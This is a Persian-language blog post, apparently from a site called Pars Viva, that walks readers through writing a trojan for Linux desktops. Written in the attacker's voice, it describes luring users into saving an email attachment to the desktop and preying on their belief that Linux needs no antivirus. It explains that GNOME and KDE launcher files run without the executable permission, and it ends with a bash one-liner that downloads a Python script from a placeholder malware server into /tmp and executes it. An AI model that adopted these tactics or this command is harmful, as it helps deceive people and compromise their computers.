البته، شايان ذكر است كه توضيح دهيم ساختار سيستم عامل لينوكس بسيار مستحكمتر از ويندوز است و بهسادگي كاربران نميتوانند با دريافت يك فايل آلوده، دچار مشكل شوند. اما، در این پست پارس ویوا خواهيم ديد كه چطور با پيمودن چند مرحله ساده، ميتوان براي لينوكس هم بدافزار نوشت.
گفته شده است كه كدي كه در ادامه مينويسيم، در دسته ويروسها قرار نميگيرد و بيشتر بهعنوان تروجانها مطرح ميشود. همچنين، بايد ذكر كنيم كه اين حفرههاي امنيتي از ويژگيهاي محيطهاي روميزي بيشتر لينوكسهاي محبوب، يعني گنوم و كيديئي بهشمار ميرود. خود هسته اصلي لينوكس هيچ كدام از اين حفرهها را ندارد. لينوكس يا هر سيستم ديگري كه بر پايه يونيكس كار ميكند، اگر از گنوم يا كيديئي استفاده نكنند، قطعا هيچ مشكلي نخواهند داشت. همچنين گفته باشيم كه جدا بودن ميزكار از سيستم عامل، خود مزيت بزرگي بهشمار ميرود و شما ميتوانيد با تغيير ميز كار خود از اين مشكل نيز دوري كنيد.
كاربران را وادار كنيد ايميلتان را بخوانند
اگر بدنبال راه جديدي براي نفوذ به كامپيوتر آسيبپذير ميگرديد، بايد نااميدتان كنيم. يكي از ابتداييترين ويروسها، با اجراي كاربر فعال ميشود و ساختار سادهاي داشت. ما نيز از همين روش استفاده خواهيم كرد و آن را روي محيط كار مدرن لينوكس پياده خواهيم نمود.
در ويندوز روال كار ساده است، شما يك ويروس مينويسيد، آن را با پسوند .exe ذخيره ميكنيد و به ايميلتان پيوست ميكنيد. سپس با يك عنوان اغواكننده، كاربر را وادار به باز كردن آن ميكنيد و كاربر نگونبخت با باز كردن آن در سيستم عامل خودش - ويندوز - و در غياب حضور نرمافزار ضدويروس، به آن دچار خواهد شد. در يك چشم بههمزدن بدافزار خود را نصب ميكند و سيستم را تصاحب خواهد كرد.
شما فكر ميكنيد چنين چيزي در لينوكس ممكن نيست؟ معلوم است كه چنين چيزي ممكن است. فقط نياز به يكي دو گام بيشتر دارد. هرچند، در معماري پايهلينوكس براي جلوگيري از حماقت كاربر و باز كردن فايلهاي آلوده، هيچ تدبيري انديشيده نشده است. بنابراين، ما مركز حملات خود را از اين ناحيه يعني ناداني كاربر آغاز خواهيم كرد.
فقط يك يا دو مورد هست كه بايد به آنها دقت كرد.
نخست اين را بگوييم كه بيشتر نرمافزارهاي ايميلخوان لينوكس فايلهاي پيوست را اجرا نميكنند. اين نرمافزارها فقط در صورتي فايلهاي پيوست را اجرا ميكنند كه بدانند محتواي آن چيست، يا پسوند آن را بشناسند (براي مثال فايل PDF يا ديگر پروندهها....) فرض كنيم كه شما ويروس خود را با زبان زيباي پايتون نوشته باشيد و پسوند آن هم .py باشد. در اين صورت يكي بايد تنظيمات سيستم را تغيير بدهد كه اين پسوند اجرا شود، چه كسي قرار است اين كار را بكند؟
پس نتيجه ميگيريم كه بايد از راه ديگري وارد شويم. چيزي كه هميشه موقع كليك كردن اجرا شود و به سراغ مرحله بعدي برويم. كاربر اول بايد پيوست را ذخيره كند و بعد روي آن دوبار كليك كند. از آنجايي كه نرمافزار ايميلخوان اين اجازه را نميدهد، مجبوريم به ميزكار رجوع كنيم و خواهيم ديد كه چهساده اجازه اين كار را خواهد داد. كافي است كه بار ديگر به ناداني كاربر اعتماد كنيم و مثلا جملهاي بنويسيم كه:
(اگر پيوست باز نميشود، روي ميزكار خود ذخيره كنيد و بعد بازش كنيد...)
بيشتر ما اين پيغام را مشكوك قلمداد ميكنيم، اما همهما نه. بنابراين، عدهاي از ميان ما حتما آن را روي ميزكارشان ذخيره خواهند كرد.
غفلت كاربران را دست كم نگيريد حتي در لينوكس
شما حتما ميخواهيد بگوييد كه كاربران لينوكس نسبت به كاربران ويندوزي از آنچه انجام ميدهند، هشيارترند. چرا كه انتخاب سيستم عامل ديگري جداي ويندوز و همچنين، يادگيري كار كردن با آن، دانشي فراتر از كاربران غيرفني را بهآنها خواهد داد. اما اين موضوع در حال تغيير است، با انقلاب نتبوكها كه بهعنوان پيشفرض رويشان لينوك نصب است. بسياري از اين كاربران ديگر آگاهانه لينوكس را انتخاب نكردهاند و درست ميزان غفلتشان به اندازه كاربران ويندوزي خواهد بود.
همچنين، دوران بيدغدغه لينوكسي در گذشته، اين حس غلط را به كاربران القا كرده است كه لينوكس همواره امن است. ما از همين ذكر كه «لينوكس بسيار امن است و نيازي به نرمافزار ضدويروس نداريد!» براي حمله استفاده خواهيم كرد و خيالمان راحت است كه وقتي آسيب زديم، نرمافزار ضدويروسي وجود ندارد كه بخواهد مچ ما را بگيرد.
بسيار خب، به مسايل فني بازگرديم، بيشتر نرمافزارهاي ايميلخوان،فايلهاي پيوست را روي ميزكار كاربر و در شاخه دانلود قرار ميدهند. بنابراين اگر كاربر فايل را بررسي نكند و آن را ذخيره كند، حقهمان را زدهايم. همانجايي كه ما مدنظرمان بود، فايلمان قرار ميگيرد.
اجرا كردن فايل پيوستي
قبلا گفتيم كه فايلهاي پيوستي وقتي ذخيره ميشوند، بهطور عادي اجرا نميشوند. هيچ پسوندي در لينوكس وجود ندارد كه بگويد وقتي روي اين فايل كليك شد، آن را اجرا كن و اين برخلاف ويندوز و پسوند .exeاش است. بنابراين، مشكل دوم و بزرگي كه به آن ميخوريم اين است: براي اجراي يك فايل در لينوكس، حتما بايد كاربر در بخش دسترسيهاي فايل،آن را به فايل اجرايي تبديل كند. اين همان چيزي است كه ويندوز ندارد. و بهخاطر همين است كه آلوده كردن سيستمهاي ويندوزي بسيار سادهتر است و تقريبا در سيستمهاي مبتني بر لينوكس غيرممكن بهنظر ميرسد. وقتي يك فايل پيوستي را روي كامپيوتر خود ذخيره ميكنيد، پرچم اجرايي كردن فايل علامت نميخورد و بههمين ترتيب، وقتي روي فايل كليك ميشود، فايل اجرا نميگردد.
تند نرويم. محيطهاي ميزكار مدرني چون كيديئي يا گنوم، يك راه درروي زيبا به نام «سكوي پرتاب» يا Launcher به ما ارائه ميدهند.
سكوهاي پرتاب فايلهاي كوچكي هستند كه نشان ميدهند چه چيز بايستي اجرا شود. فقط چند خط كوتاه ميتواند اسم، آيكن و دستوري كه بايد اجرا شود را مشخص كند. خوشبختانه براي ما، گرامر دستور نوشتن در كيديئي و گنوم يكي است. همچنين جالب است بدانيد اين سكوهاي پرتاب نيازي به تنظيمات اجرايي ندارند! محيطهاي ميزكار اين فايلها را بهعنوان فايل استثنا قلمداد ميكنند.
بنابراين وقتي روي فايل سكوي پرتاب گنوم يا كيديئي كليك ميكنيد، بدون آنكه نيازي به تنظيم كردن دسترسي خاصي باشيد، آن فايل اجرا ميشود. بهنظرتان سخت است كه با يك دستور بخواهيم يك بدافزار را روي سيستم نصب كنيم؟ اينجا را ببينيد:
% bash -c "curl http://www.some_malware_
server.org/s.py -o /tmp/s.py; python /tmp/s.py"
منبع: www.parsviva.com